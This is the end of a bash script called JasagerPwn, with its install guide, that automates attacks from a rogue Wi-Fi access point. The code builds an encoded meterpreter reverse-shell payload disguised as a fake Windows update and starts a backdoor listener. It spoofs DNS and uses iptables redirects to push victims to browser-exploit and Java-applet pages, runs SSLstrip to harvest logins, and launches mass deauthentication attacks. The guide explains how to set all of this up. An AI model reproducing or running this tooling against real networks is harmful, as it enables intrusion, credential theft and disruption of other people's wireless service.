#Check for bad index.html.. whys it index2.html? lolwtf
if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then
mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html"
fi
if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then
mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html"
fi
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
sleep 2
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
javaATK="1"
fi
while true
do
if [ $browserpwn -eq 1 ]; then break; fi
if [ $fakeupdate -eq 1 ]; then break; fi
#echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: "
#read -e $CONFIRM7
echo
echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m"
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE9
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9
case $USR_CHOICE9 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
javaATK="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
break
;;
M|m|Menu|menu|2)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
F|f|fakeupdate|Fakeupdate|2)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $fakeupdate -eq 0 ]; then
if [ $autoMetScript -eq 1 ]; then metScript; fi
echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..."
xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe"
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
ipTableRedirect
#iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
#xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" &
xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" &
echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..."
xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
sleep 3
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
fakeupdate="1"
echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..."
xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload"
fi
while true
do
if [ $browserpwn -eq 1 ]; then break; fi
if [ $javaATK -eq 1 ]; then break; fi
#echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: "
#read -e $CONFIRM7
echo
echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m"
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE1
case $USR_CHOICE1 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" &
fakeupdate="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
break
;;
M|m|Menu|menu|2)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
B|b|browserpwn|browserPwn|3)
if [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $browserpwn -eq 0 ]; then
if [ $autoMetScript -eq 1 ]; then metScript; fi
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" &
#xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" &
sleep 25
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
ipTableRedirect
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..."
browserpwn="1"
fi
while true
do
if [ $fakeupdate -eq 1 ]; then break; fi
if [ $javaATK -eq 1 ]; then break; fi
echo
echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m"
echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
read -e USR_CHOICE2
#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2
case $USR_CHOICE2 in
S|s|Stop|stop|1)
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
IPTABLES
xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
browserpwn="0"
sleep 3
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
if [ $wasSniffing != "0" ]; then
sslstrip
fi
echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!"
echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!"
break
;;
M|m|Menu|menu|2)
echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it."
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
D|d|deauth|Deauth|DeAuth|5)
attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
while true
do
echo
echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m"
echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth"
echo -e "\e[01;33m[!]\e[00m [4][K]ill [5][M]ain menu"
#read -r -p "[?] Please enter [ A | D | S | K | M ]: " USR_CHOICE3
echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
read -e USR_CHOICE3
case $USR_CHOICE3 in
A|a|airodrop|Airodrop|1)
if [ -e "/usr/bin/airdrop-ng" ]; then
if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi
sleep 2
xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" &
AIRDUMPID=`echo $!`
sleep 10
xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" &
AIRDROPID=`echo $!`
else
echo
echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this."
echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py."
fi
;;
D|d|deauth|DeAuth|2)
#if [ ! $ATKcheck ]; then
# xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" &
# sleep 4
#fi
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" &
DEAUTHPID=`echo $!`
;;
S|s|single|Single|3)
#if [ ! $ATKcheck ]; then
# xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" &
# sleep 4
#fi
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" &
xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" &
airID=`echo $!`
echo
read -r -p "[?] Enter the target APs BSSID: " TBSSID
kill $airID
read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE
case $DMODE in
y|Y|Yes|yes|1)
xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" &
echo
read -r -p "[?] Enter the target Client MAC: " CMAC
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" &
;;
n|N|No|no|2)
xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" &
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
#take in information from dump for aireplay
;;
K|k|kill|Kill|4)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" &
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" &
;;
M|m|menu|Menu|5)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
N|n|Network|network|net|6)
while true
do
echo
echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m"
echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2][D]eAuth Config"
echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain menu"
echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
read -e USR_CHOICE99
case $USR_CHOICE99 in
I|i|interface|Interface|1)
read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98
case $USR_CHOICE98 in
#Connecting to WIFI
y|Y|Yes|yes|1)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
#kill $dnsID2 >/dev/null 2>&1
echo
read -p "[!] Connect to WiFi Network THEN Press [Enter] .."
echo
echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE
IFACE=`echo $NEWIFACE`
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
IPTABLES
elif [ $sniffing -eq 1 ]; then
ipTableRedirect
elif [ $browserpwn -eq 1 ]; then
ipTableRedirect
elif [ $fakeupdate -eq 1 ]; then
ipTableRedirect
elif [ $javaATK -eq 1 ]; then
ipTableRedirect
fi
while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
sleep 2 && dnsID2=`echo $!`
wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
;;
#Connecting to HARDWIRE
n|N|No|no|2)
#kill $dnsID2 >/dev/null 2>&1
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
echo
echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE
IFACE=`echo $NEWIFACE`
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
IPTABLES
elif [ $sniffing -eq 1 ]; then
ipTableRedirect
elif [ $browserpwn -eq 1 ]; then
ipTableRedirect
elif [ $fakeupdate -eq 1 ]; then
ipTableRedirect
elif [ $javaATK -eq 1 ]; then
ipTableRedirect
fi
#while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
sleep 2 && dnsID2=`echo $!`
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
;;
D|d|deauth|DeAuth|2)
xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf"
echo
echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes."
;;
R|r|refresh|Refresh|3)
xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE"
sleep 3
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" &
#while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null &
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
sleep 2 && dnsID2=`echo $!`
;;
M|m|menu|Menu|4)
break
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
;;
X|x|exit|Exit|7)
cleanup
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
done
cleanup
#######################################################################################
INSTALL_HOWTO:
================================
JasagerPwn Attack Vector Script
--------------------------------
leg3nd @ info-s3curity.com
--------------------------------
Bugs @ hak5 forums or via email
dgriffin831@gmail.com
--------------------------------
================================
General Description: This is a fairly basic bash script used to automate multiple attack vectors
using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms
of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios
because of all the time saved doing basic setup for attacks manually. Enjoy at your own risk!
-This script assumes you are using BackTrack 4 with /pentest/; if you
have it somewhere else, adjust it accordingly.
The following dependencies are required for full functionality of the script...
Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite,
DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection.
Step 1: Ensure you have everything needed.
------------------------------------------
apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5
cd /pentest/exploits/SET/ && python install.py
cd /pentest/wireless/airdrop-ng/ && python install.py
- Make sure SSLstrip is installed with the same method; I think it is by default in BT4.
If it isn't working, this is how to install it:
cd /pentest/
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar xvf sslstrip-0.7.tar.gz
cd sslstrip-0.7/
chmod +x setup.py
python setup.py
Step 2: Adjust the script variables.
------------------------------------
- Open up the script in your favorite editor and look over all the variables and their comments.
- If you're not using BT4 you may need to adjust the SET and MSF directories.
- Set up the correct interfaces according to your setup.
- Set the 'fonIP' variable to an available IP on the FONs subnet.
- I recommend setting up the 'metScript' function to automatically do what you need on your victims; by
default this is set to "0" and uses reverse_tcp_dns backdoors.
Step 3: Setup FON
------------------
- We need to remove DHCP on the Fon because we will be running it from the computer instead.
- If you're using some other DHCP service you may also need to disable that.
/etc/init.d/dnsmasq stop
/etc/init.d/dnsmasq disable
That's it! If everything is done correctly, and assuming the system has the correct versions of python and ruby,
you should be good to go.
=======================
Included Attacks
=======================
SSLstrip/Sniffing: By default it will always be using dsniff, driftnet, and urlsnarf because it is seamless to the users anyway.
The SSLstrip/sniffing attack will start stealing SSL certs from https:// websites as they browse; it works on
around 95% of SSL websites. These logs will be followed, saved, and parsed for login credentials. SSLstrip is
set to use port 10000 and will be paused when using other attacks.
FakeUpdate (by g0tmi1k): Redirects WLAN to a fake Microsoft update page hosted in Apache, with a generated meterpreter
reverse_tcp payload. This currently only has download support for MS clients.
BrowserPwn: This will redirect WLAN to a Metasploit browser_autopwn server. This is fairly noisy and will throw out any exploit
that is available for that browser to gain a reverse_tcp meterpreter session. This works on any OS.
JavaPwn: This will redirect WLAN to a SET-generated Java page with a reverse_tcp meterpreter Java applet. It asks to 'run' the
applet while on a cloned/modified version of the Java download page. Cloned pages include Google and a fake Sun Java page.
Keep in mind that cloned pages need to have images, scripts, and CSS hosted LOCALLY to work.
-This attack vector is included with 2 templates in the script (google and a java required page).
-KEEP IN MIND - When combining the "clone website" feature of SET with these iptables commands, the template will be
obscured because images cannot be pulled from the remote server. I manually edited the sites to work.
DeAuth: There are a few different de-authentication attacks included in the script.
-The most effective is airdrop-ng, a client- and rule-based mass deauth tool. It is set to deauth every AP around
you except your AP and your wireless card (so you can tunnel via wireless).
-I normally keep a terminal open in /tmp (where the config files are created at the start of the script), and you may
manually edit the deauth configurations as needed. They will not reset until the whole script restarts.
-"Mass DeAuth" is a rather simple bash script which uses iwscan to gather AP information and sends out deauth packets via
'aireplay-ng -0', but this is sent to the AP (broadcast) itself, and not client based.
-Single DeAuth is just a normal deauth attack; this is if you wanted to be a little stealthy and pick up specific clients.